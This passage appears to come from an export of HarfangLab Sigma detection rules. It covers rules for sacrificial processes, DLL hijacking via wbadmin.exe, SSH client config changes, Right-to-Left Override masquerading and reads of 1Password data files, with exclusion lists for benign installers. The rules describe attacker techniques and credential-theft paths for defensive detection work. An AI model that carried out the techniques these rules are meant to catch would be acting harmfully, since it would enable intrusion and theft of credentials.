/DIR=C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\N10CP0~1\\ /EXTRACT=YES\n - '/VERYSILENT /SP- /DIR=?:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\'\n 
# C:\\Users\\xxxxx\\AppData\\Local\\Temp\\is-U2SKB.tmp\\k2vdo07us14.tmp /SL5=$B004C,175816560,56832,C:\\Users\\xxxxx\\Downloads\\k2vdo07us14.exe /SPAWNWND=$70658 /NOTIFYWND=$8054E\n - '/SL5=* /SPAWNWND=* /NOTIFYWND='\n # C:\\Users\\xxx\\AppData\\Local\\Temp\\is-621FA.tmp\\nz3gr01w.tmp /SL5=$813AC,23294916,56832,C:\\ProgramData\\Lenovo\\UpdateRetriever\\Session\\LenovoDrivers\\temp\\868\\nz3gr01w.exe /VERYSILENT /EXTRACT=YES /DIR=C:\\LenovoDriverPacks\\ThinkPad X1 Yoga 3rd Gen Type 20LD 20LE 20LF 20LG win10\\Security\\nz3gr01w\n - '/VERYSILENT /EXTRACT=YES /DIR=?:\\LenovoDriverPacks'\n # C:\\WINDOWS\\TEMP\\is-J5LLB.tmp\\n1wvu28w.tmp /SL5=$D00A6,14025556,54272,C:\\WINDOWS\\ccmcache\\h\\n1wvu28w.exe /PARAM=/S /SP- /VERYSILENT /NORESTART /SUPPRESSMSGBOXES\n - '/PARAM=/S /SP- /VERYSILENT /NORESTART /SUPPRESSMSGBOXES'\n\n exclusion_msedge_updater:\n - ParentImage|endswith: '\\setup.exe'\n ParentCommandLine|contains|all:\n # seen \"d:\\profils\\XXXX\\AppData\\Local\\Temp\\EDGEMITMP_22230.tmp\\setup.exe\" --install-archive=\"d:\\profils\\XXXX\\AppData\\Local\\Temp\\EDGEMITMP_22230.tmp\\MSEDGE_PATCH.PACKED.7Z\" --previous-version=\"91.0.864.37\" --msedge --verbose-logging --do-not-launch-msedge\n - '.PACKED.7Z' # either MSEDGE_PATCH.PACKED.7Z or MSEDGE.PACKED.7Z\n - '--msedge'\n - '--do-not-launch-msedge'\n - ParentImage|endswith: '\\setup.exe'\n ParentCommandLine|contains|all:\n # seen C:\\Users\\xxx\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{1B0E22A8-A5FA-401B-BC1C-5376E496005C}\\EDGEMITMP_BCFB1.tmp\\setup.exe --install-archive=C:\\Users\\xxx\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{1B0E22A8-A5FA-401B-BC1C-5376E496005C}\\MicrosoftEdge_X64_103.0.1264.37_102.0.1245.44.exe --previous-version=102.0.1245.44 --msedge --verbose-logging --do-not-launch-msedge --channel=stable\n - 'AppData\\Local\\Microsoft\\EdgeUpdate' # either MSEDGE_PATCH.PACKED.7Z or MSEDGE.PACKED.7Z\n - '--msedge'\n - '--do-not-launch-msedge'\n - Image: '?:\\Windows\\System32\\rundll32.exe'\n 
ParentImage:\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\*\\Installer\\setup.exe'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{????????-????-????-????-????????????}\\EDGEMITMP_*.tmp\\setup.exe'\n GrandparentImage:\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\*\\Installer\\setup.exe'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{????????-????-????-????-????????????}\\MicrosoftEdge_X64_*.exe'\n\n exclusion_lenovo_systemupdate:\n User: '*lenovo_tmp_*'\n # \"c:\\windows\\TempInst\\is-2FIDC.tmp\\HSW_vProChecker.tmp\" /SL5=\"$A0742,290538,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\jdrg04ww\\HSW_vProChecker.exe\" /VERYSILENT /PARAM=\"-feat !!M3 Autotest!! -value !!Enabled!!\"\n ParentCommandLine: '*/VERYSILENT*'\n\n exclusion_nvidia_installer:\n # c:\\windows\\syswow64\\rundll32.exe c:\\users\\XXX\\AppData\\Local\\Temp\\NVI2_29.DLL,DeferredDelete {XXX-XXX-XXX (GUID)} 11111 c:\\windows\\syswow64\\rundll32.exe\n CommandLine: '*\\windows\\syswow64\\rundll32.exe*DeferredDelete *\\windows\\syswow64\\rundll32.exe*'\n\n exclusion_pdf_xchange:\n # C:\\Users\\XXXX\\AppData\\Local\\Temp\\is-E1ON0.tmp\\PDFX4SA_sm.tmp /SL5=$1A083A,5674009,54272,\\\\...\\PostInstallation\\PDFTools\\PDFX4SA_sm.exe /SILENT /NORESTART /DIR=C:\\Program Files\\Tracker Software\\PDF-XChange 4\" /LANG=fr /PName=PDF-XChange pour XXXX\n ParentCommandLine|contains: 'Program Files\\Tracker Software\\PDF-XChange'\n\n exclusion_chromecleaner:\n # C:\\Users\\xxxx\\AppData\\Local\\Temp\\ChromeCleaner_0_2084_1964492881\\88407957-5e5a-4da3-8ccc-ed403471c9ce.exe --chrome-version=102.0.5005.115 --chrome-channel=4 --chrome-exe-path=C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --chrome-system-install --execution-mode=1 --engine=2 --chrome-prompt=3 --reset-shortcuts --chrome-write-handle=3960 --chrome-read-handle=2024\n ParentCommandLine|contains|all:\n - '--chrome-exe-path'\n - '--reset-shortcuts'\n - 
'--chrome-system-install'\n - '--chrome-channel'\n\n exclusion_citrix:\n # C:\\Windows\\SysWOW64\\rundll32.exe\n ParentImage|contains: '\\AppData\\Local\\Citrix\\ICA Client\\CitrixBrowser\\\\*\\Installer\\setup.exe'\n GrandparentImage|endswith:\n - '\\AppData\\Local\\Temp\\Ctx*\\CitrixReceiver\\Ctx-*\\Extract\\TrolleyExpress.exe'\n - '\\AppData\\Local\\Citrix\\Citrix Workspace *\\CWAInstaller.exe'\n\n exclusion_exchange:\n # C:\\Windows\\system32\\w32tm.exe\n ParentCommandLine: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command . ?*\\Microsoft Exchange\\\\*\\bin\\RemoteExchange.ps1?; Connect-ExchangeServer -auto*'\n\n exclusion_dell:\n GrandparentImage: '?:\\ProgramData\\Dell\\drivers\\\\????????-????-????-????-????????????\\DellOptimizer.exe'\n\n exclusion_firewall:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\FirewallControlPanel.dll,ShowNotificationDialog '\n ParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalServiceNoNetworkFirewall -p'\n\n exclusion_credentialuibroker:\n Image:\n - '?:\\Windows\\System32\\CredentialUIBroker.exe'\n - '?:\\Windows\\SysWOW64\\CredentialUIBroker.exe'\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Program Files\\UiPath\\Studio*'\n\n exclusion_landesk:\n GrandparentCommandLine|startswith: '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdmcache'\n\n exclusion_lenovo:\n GrandparentCommandLine|endswith: 'setup.exe /verysilent'\n Signed: 'true'\n Company: 'Lenovo Group Limited'\n\n exclusion_dataview:\n GrandparentImage: '?:\\Program Files (x86)\\DataView\\PDFXChange\\PDFX3SA_sm.exe'\n\n exclusion_powershell_command:\n Image: '?:\\Windows\\System32\\w32tm.exe'\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_*\\WindowsTerminal.exe'\n\n exclusion_sihost:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n 
GrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ec7ff2f-b99d-4397-9fcc-f13cc813f7fc",
"rule_name": "Potential Sacrificial Process Spawned",
"rule_description": "Detects suspicious system processes spawned without arguments that can be used as sacrificial ones.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate parent-child process relationships of argumentless system processes and to isolate any suspicious instances for memory analysis.\n",
"rule_creation_date": "2020-11-23",
"rule_modified_date": "2026-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ed28bb8-b225-4f34-936c-2f4d80bc9cd0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594277Z",
"creation_date": "2026-03-23T11:45:34.594280Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594288Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wbadmin.yml",
"content": "title: DLL Hijacking via wbadmin.exe\nid: 5ed28bb8-b225-4f34-936c-2f4d80bc9cd0\ndescription: |\n Detects potential Windows DLL Hijacking via wbadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wbadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\credui.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ed28bb8-b225-4f34-936c-2f4d80bc9cd0",
"rule_name": "DLL Hijacking via wbadmin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wbadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ed4dcef-5d3f-4b96-9778-049416f24d30",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297519Z",
"creation_date": "2026-03-23T11:45:35.297521Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297525Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1563/001/",
"https://attack.mitre.org/techniques/T1484/"
],
"name": "t1021_004_ssh_client_config_modified_linux.yml",
"content": "title: SSH Client Configuration Modified\nid: 5ed4dcef-5d3f-4b96-9778-049416f24d30\ndescription: |\n Detects an attempt to modify the content of the SSH client configuration file.\n The SSH client configuration contains the security settings used by SSH.\n An attacker can modify the SSH client configuration to achieve persistence.\n It is recommended to investigate the context in which these changes were made and eventually the SSH configuration itself for any suspicious configurations.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/ssh/ssh_config'\n - TargetPath: '/etc/ssh/ssh_config'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n filter_chmod:\n Kind: 'chmod'\n\n exclusion_ssh:\n - ProcessImage: '/usr/bin/ssh'\n - ProcessParentImage: '/usr/bin/ssh'\n exclusion_scp:\n - ProcessImage: '/usr/bin/scp'\n - ProcessParentImage: '/usr/bin/scp'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: 
'/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /usr/bin/dnf'\n - '/usr/bin/python* /bin/dnf'\n exclusion_apk:\n ProcessAncestors|contains: '/sbin/apk'\n exclusion_kaniko:\n ProcessAncestors|contains: '/kaniko/executor'\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc 
--copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_sed:\n ProcessCommandLine|startswith: 'sed -ne'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ed4dcef-5d3f-4b96-9778-049416f24d30",
"rule_name": "SSH Client Configuration Modified",
"rule_description": "Detects an attempt to modify the content of the SSH client configuration file.\nThe SSH client configuration contains the security settings used by SSH.\nAn attacker can modify the SSH client configuration to achieve persistence.\nIt is recommended to investigate the context in which these changes were made and, if necessary, the SSH configuration itself for any suspicious settings.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-06",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1484",
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f065dc5-d8ee-441d-b1eb-51d0945edf2a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069725Z",
"creation_date": "2026-03-23T11:45:34.069727Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069731Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.freecodecamp.org/news/rtlo-in-hacking/",
"https://attack.mitre.org/techniques/T1036/002/"
],
"name": "t1036_002_right_to_left_override.yml",
"content": "title: Right-to-Left Override Character Masquerading\nid: 5f065dc5-d8ee-441d-b1eb-51d0945edf2a\ndescription: |\n Detects a process containing the Right-to-Left Override (RLO) character (U+202E) in its command-line.\n RLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.\n Adversaries may abuse the RLO character to disguise a string and/or file name to make it appear benign.\n This technique is often used by attackers to make a user execute a malicious executable disguised as a media file (PDF, DOCX, etc.) as part of a phishing attack.\n It is recommended to investigate the legitimacy of the detected process, as well as the origin of the detected executable.\nreferences:\n - https://www.freecodecamp.org/news/rtlo-in-hacking/\n - https://attack.mitre.org/techniques/T1036/002/\ndate: 2025/10/21\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains: ''\n\n exclusion_firefox:\n Image|endswith:\n - '\\firefox.exe'\n - '\\waterfox.exe'\n CommandLine|contains|all:\n - '-intPrefs'\n - '-contentproc'\n - '-isForBrowser'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f065dc5-d8ee-441d-b1eb-51d0945edf2a",
"rule_name": "Right-to-Left Override Character Masquerading",
"rule_description": "Detects a process containing the Right-to-Left Override (RLO) character (U+202E) in its command-line.\nRLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.\nAdversaries may abuse the RLO character to disguise a string and/or file name to make it appear benign.\nThis technique is often used by attackers to make a user execute a malicious executable disguised as a media file (PDF, DOCX, etc.) as part of a phishing attack.\nIt is recommended to investigate the legitimacy of the detected process, as well as the origin of the detected executable.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f0f143a-fd02-4927-a0c4-9cbad45d0ade",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617607Z",
"creation_date": "2026-03-23T11:45:34.617609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617613Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/005/"
],
"name": "t1552_004_read_1password_sensitive_files_macos.yml",
"content": "title: Suspicious Access to 1Password Sensitive Files\nid: 5f0f143a-fd02-4927-a0c4-9cbad45d0ade\ndescription: |\n Detects a process reading sensitive files related to the 1Password password manager.\n Adversaries may read the user's password in order to gather credentials and impersonate users on multiple services.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/Library/Application Support/1Password/'\n ProcessImage|contains: '?'\n\n filter_1password:\n Image:\n - '/Applications/1Password.app/Contents/*'\n - '/Users/*/Applications/1Password.app/Contents/*'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: 
'/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n\n exclusion_avast:\n Image: 
'/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'pmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f0f143a-fd02-4927-a0c4-9cbad45d0ade",
"rule_name": "Suspicious Access to 1Password Sensitive Files",
